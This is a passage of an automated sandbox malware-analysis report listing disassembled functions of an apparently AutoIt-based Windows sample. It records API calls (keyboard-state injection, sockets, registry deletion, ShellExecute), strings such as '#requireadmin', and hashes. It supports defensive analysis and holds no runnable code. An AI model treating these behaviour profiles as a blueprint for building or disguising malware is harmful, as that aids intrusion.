ShellExecuteExW.SHELL32(?), ref: 00D7F86A

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

Part of subcall function 00D1FEC6: _wcscpy.LIBCMT ref: 00D1FEE9

GetProcessId.KERNEL32(00000000), ref: 00D7F8E1
CloseHandle.KERNEL32(00000000), ref: 00D7F910

Strings

@, xrefs: 00D7F839

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 889db88ee435393f36eddbd48103831120bd0b922578774a2de6ed7a1eaf0ce3
Instruction ID: 70c77442be59687fca448919087512cb2f4dbfb47bf2afe1e247abcfe6402bdd
Opcode Fuzzy Hash: 889db88ee435393f36eddbd48103831120bd0b922578774a2de6ed7a1eaf0ce3
Instruction Fuzzy Hash: 84616EB5A00619DFCB14DF68D591AAEBBF5FF48310B148469E849AB391DB30AD40CFB0

Function 00D6145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00D6149C
GetKeyboardState.USER32(?), ref: 00D614B1
SetKeyboardState.USER32(?), ref: 00D61512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00D61540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00D6155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00D615A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D615C8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c1a4fb62f2789bd9bfd2abd84d9f9c294ef1bf61111aa8ce740cb308c0832502
Instruction ID: babb81d09cb6f285d2cc0c2a54e5f583cc9ded1d0de324313b3a3d157b760793
Opcode Fuzzy Hash: c1a4fb62f2789bd9bfd2abd84d9f9c294ef1bf61111aa8ce740cb308c0832502
Instruction Fuzzy Hash: 5E51E3B4A047D53FFB324674CC45BBABEA9AB46304F0C8589E1D6868D2C794EC88D770

Function 00D61276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00D612B5
GetKeyboardState.USER32(?), ref: 00D612CA
SetKeyboardState.USER32(?), ref: 00D6132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D61357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D61374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D613B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D613D9

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: aaaf23fe007c9233fd9e2c3bf0aee0eabade5ce4ce6cbd2a8527af33db9afda9
Instruction ID: 2abb5785efbbce3a93a541260816a2459a17373637c6262deda47ef10b119c9b
Opcode Fuzzy Hash: aaaf23fe007c9233fd9e2c3bf0aee0eabade5ce4ce6cbd2a8527af33db9afda9
Instruction Fuzzy Hash: 9C5123A49043D53FFB3283248C51B7ABFA9AB06300F0C8589E1D5869C2D794EC88E770

Function 00D6589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00D658AC
_wcsncpy.LIBCMT ref: 00D658E1
_wcsncpy.LIBCMT ref: 00D65913
_wcsncpy.LIBCMT ref: 00D65946
_wcsncpy.LIBCMT ref: 00D65988
_wcsncpy.LIBCMT ref: 00D659C2
_wcsncpy.LIBCMT ref: 00D659F1

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 0f4f32b580905d11946f49fd94bca820b5dcd269830f5ad544928b3fd5f685b6
Instruction ID: af07b6e3725dc45e7321bd4a17298cf65a6b27b2b46d4f1988e2fdd55514d576
Opcode Fuzzy Hash: 0f4f32b580905d11946f49fd94bca820b5dcd269830f5ad544928b3fd5f685b6
Instruction Fuzzy Hash: 57418165C20628B6CB10EBF8EC869DFB3A8DF15310F508956F918E3121E634E755C7B9

Function 00D638AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D638D3,?), ref: 00D648C7

Part of subcall function 00D648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D638D3,?), ref: 00D648E0

lstrcmpiW.KERNEL32(?,?), ref: 00D638F3
_wcscmp.LIBCMT ref: 00D6390F
MoveFileW.KERNEL32(?,?), ref: 00D63927
_wcscat.LIBCMT ref: 00D6396F
SHFileOperationW.SHELL32(?), ref: 00D639DB

Strings

\*.*, xrefs: 00D63969

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: cb9b088bb0a13b1a054e8b29cbcd608e7d10ddf8c6389962c46f5a0a796dbd39
Instruction ID: 65bcadaa938a2dfd9d32dd03d4ac4d9d036e7f14e3e6d3fae451994897047a96
Opcode Fuzzy Hash: cb9b088bb0a13b1a054e8b29cbcd608e7d10ddf8c6389962c46f5a0a796dbd39
Instruction Fuzzy Hash: 92418F725083449BD755EF64D481AEBB7E8EF89340F04092EB48AC3251EA75D788CF72

Function 00D87500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D87519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D875C0
IsMenu.USER32(?), ref: 00D875D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D87620
DrawMenuBar.USER32 ref: 00D87633

Strings

0, xrefs: 00D8750D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 84aef648e46ae8814eb6f9a79870a416f6f48bbc2a960b86469cf912bb68e0f3
Instruction ID: c902c5497fdf7e759f29020a828514ae391ad64dbc68ce8443290fa1c234861e
Opcode Fuzzy Hash: 84aef648e46ae8814eb6f9a79870a416f6f48bbc2a960b86469cf912bb68e0f3
Instruction Fuzzy Hash: F0412875A04609AFDB10EF54D885E9ABBF8FF05314F188169E955A7390D730ED50CFA0

Function 00D8122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00D8125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D81286
FreeLibrary.KERNEL32(00000000), ref: 00D8133D

Part of subcall function 00D8122D: RegCloseKey.ADVAPI32(?), ref: 00D812A3
Part of subcall function 00D8122D: FreeLibrary.KERNEL32(?), ref: 00D812F5
Part of subcall function 00D8122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D81318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00D812E0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 55127139aa76cf2db09604e0d6415acd97c374d2f50f295ab36eaa2c5e42b61c
Instruction ID: 963c9cc1b4471b8015e5b139b0e3f722addbfe10e1249488d62443fcb5394606
Opcode Fuzzy Hash: 55127139aa76cf2db09604e0d6415acd97c374d2f50f295ab36eaa2c5e42b61c
Instruction Fuzzy Hash: 2B312FB5911219BFDB14AF90DC89EFEB7BCEF08300F140169E505E2251DA749E8A9BB4

Function 00D8653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00D8655B
GetWindowLongW.USER32(00FC5AD8,000000F0), ref: 00D8658E
GetWindowLongW.USER32(00FC5AD8,000000F0), ref: 00D865C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00D865F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00D8661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00D86630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D8664A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 847c6f8615df83117c893e10891cc6074e90d324a74cdc55379d03c0d971c6b6
Instruction ID: c5a593a7e6a7fd4d4411dca99b72a5390c8f1f96bff5d8e07ed41ca5fa4ceb94
Opcode Fuzzy Hash: 847c6f8615df83117c893e10891cc6074e90d324a74cdc55379d03c0d971c6b6
Instruction Fuzzy Hash: C031F270604251AFDB21DF18DC86F553BE1FB4A720F1902A8F511CB2F5DB61E840DB61

Function 00D76486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00D780CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00D764D9
WSAGetLastError.WSOCK32(00000000), ref: 00D764E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D76521
connect.WSOCK32(00000000,?,00000010), ref: 00D7652A
WSAGetLastError.WSOCK32 ref: 00D76534
closesocket.WSOCK32(00000000), ref: 00D7655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D76576

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 409e078fce60c550b450014899c12600e23beab253c8b1480b94857da30372fb
Instruction ID: 853806b9c01a28e70dfe12e6cfa7555ced0b612aa4e065ae6e920dfb3343ece6
Opcode Fuzzy Hash: 409e078fce60c550b450014899c12600e23beab253c8b1480b94857da30372fb
Instruction Fuzzy Hash: FD319E71600618AFDB10AF24CC85BBE7BB9EB44714F048029FD49D7291EB70E904DBB1

Function 00D5E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D5E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D5E120
SysAllocString.OLEAUT32(00000000), ref: 00D5E123
SysAllocString.OLEAUT32 ref: 00D5E144
SysFreeString.OLEAUT32 ref: 00D5E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00D5E167
SysAllocString.OLEAUT32(?), ref: 00D5E175

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 02ece3d225ae45a8abfc82f0e6b605524d70f5334d071c4b0edced5e36bf73e4
Instruction ID: 6897d0314c4f395c7c14de8fec53b9e5f98df61c18183b048c24c07b6e58702d
Opcode Fuzzy Hash: 02ece3d225ae45a8abfc82f0e6b605524d70f5334d071c4b0edced5e36bf73e4
Instruction Fuzzy Hash: 1B21AF75200718AF9F14AFACDC88CAB77ECEB197A1B148126FD54CB2A0DA70DD458B70

Function 00D5FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D5FB81
__wcsnicmp.LIBCMT ref: 00D5FBA2
__wcsnicmp.LIBCMT ref: 00D5FBBC

Strings

#OnAutoItStartRegister, xrefs: 00D5FBB6
#notrayicon, xrefs: 00D5FB79
#requireadmin, xrefs: 00D5FB9C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: da4868d56e26800411b1da56a3b35ded87c244023c890b3f304fe38c6e8f7efd
Instruction ID: f78a4ac4d87cb6c4998d829ec100fd480a68e20a19d05bd7853161e88477f80f
Opcode Fuzzy Hash: da4868d56e26800411b1da56a3b35ded87c244023c890b3f304fe38c6e8f7efd
Instruction Fuzzy Hash: AE214972204265AADB30A734ED52FBB7398DF61345F188035FC868F181EB51ED89D2B1

Function 00D8783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D01D73
Part of subcall function 00D01D35: GetStockObject.GDI32(00000011), ref: 00D01D87
Part of subcall function 00D01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D01D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D878A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D878AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D878B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D878C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D878D4

Strings

Msctls_Progress32, xrefs: 00D87872

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b4e479518144417fa93f9ac37b3fe93bd97554eb58aff09195f68c5731078fe4
Instruction ID: 4bb41ee533980245280b63a3afd4ab284322ce0ef2972ae3725da5c9e3c9d5c4
Opcode Fuzzy Hash: b4e479518144417fa93f9ac37b3fe93bd97554eb58aff09195f68c5731078fe4
Instruction Fuzzy Hash: 141190B211021ABFEF159F60CC85EE77F6DEF08768F114115BA04A2090CB72AC21DBB0

Function 00D241C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00D24292,?), ref: 00D241E3
GetProcAddress.KERNEL32(00000000), ref: 00D241EA
EncodePointer.KERNEL32(00000000), ref: 00D241F6
DecodePointer.KERNEL32(00000001,00D24292,?), ref: 00D24213

Strings

RoInitialize, xrefs: 00D241D2
combase.dll, xrefs: 00D241DE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 4afeddb96d8665b8d9e336a0eea7665fb5b2852d7c56143d6f36144ed89c0688
Instruction ID: a6bc150e55a64956966d536813c98ae7716b0056e77d660b891dd52ba650f2cd
Opcode Fuzzy Hash: 4afeddb96d8665b8d9e336a0eea7665fb5b2852d7c56143d6f36144ed89c0688
Instruction Fuzzy Hash: 06E01AB0AA0302AEEF215BB1EC1DF143AA4BB20B06F144424F851D52A0DBB540959F74

Function 00D2429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D241B8), ref: 00D242B8
GetProcAddress.KERNEL32(00000000), ref: 00D242BF
EncodePointer.KERNEL32(00000000), ref: 00D242CA
DecodePointer.KERNEL32(00D241B8), ref: 00D242E5

Strings

RoUninitialize, xrefs: 00D242A7
combase.dll, xrefs: 00D242B3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 158830216f177518c3d406ab9c06739bb035d68597a87a893fc3885dd03c481f
Instruction ID: 0c8d6e3eb437056c968f24b5173a5453e33e422cd80767a9ee649cd2fb735b82
Opcode Fuzzy Hash: 158830216f177518c3d406ab9c06739bb035d68597a87a893fc3885dd03c481f
Instruction Fuzzy Hash: 2EE0B6786A1312EFEB109B61FD1DF563AA4BB24B46F184024F451E12A0CBB54544DB78

Function 00D6675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D668AD
_memmove.LIBCMT ref: 00D667E8

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

_memmove.LIBCMT ref: 00D6685B
_memmove.LIBCMT ref: 00D66942
_memmove.LIBCMT ref: 00D6695B
_memmove.LIBCMT ref: 00D66977

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 95a225106d8380a5268d14cceb21de54e68c4e585c82263a1fe59988c8c813e6
Instruction ID: 879d81ff11e2fb58a69cf831af2609c655ff34158bfa7ea162093a141941ea14
Opcode Fuzzy Hash: 95a225106d8380a5268d14cceb21de54e68c4e585c82263a1fe59988c8c813e6
Instruction Fuzzy Hash: 51619A3050029AABCF11EF64D892FFE7BA4EF54308F044519F8996B2D2DA30E945CBB0

Function 00D8046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D80038,?,?), ref: 00D810BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D80548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D80588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00D805AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D805D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D80617
RegCloseKey.ADVAPI32(00000000), ref: 00D80624

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: f2a6f5382714c27319aab2bf83acd580bc7c789af58717d0898c774754ebb474
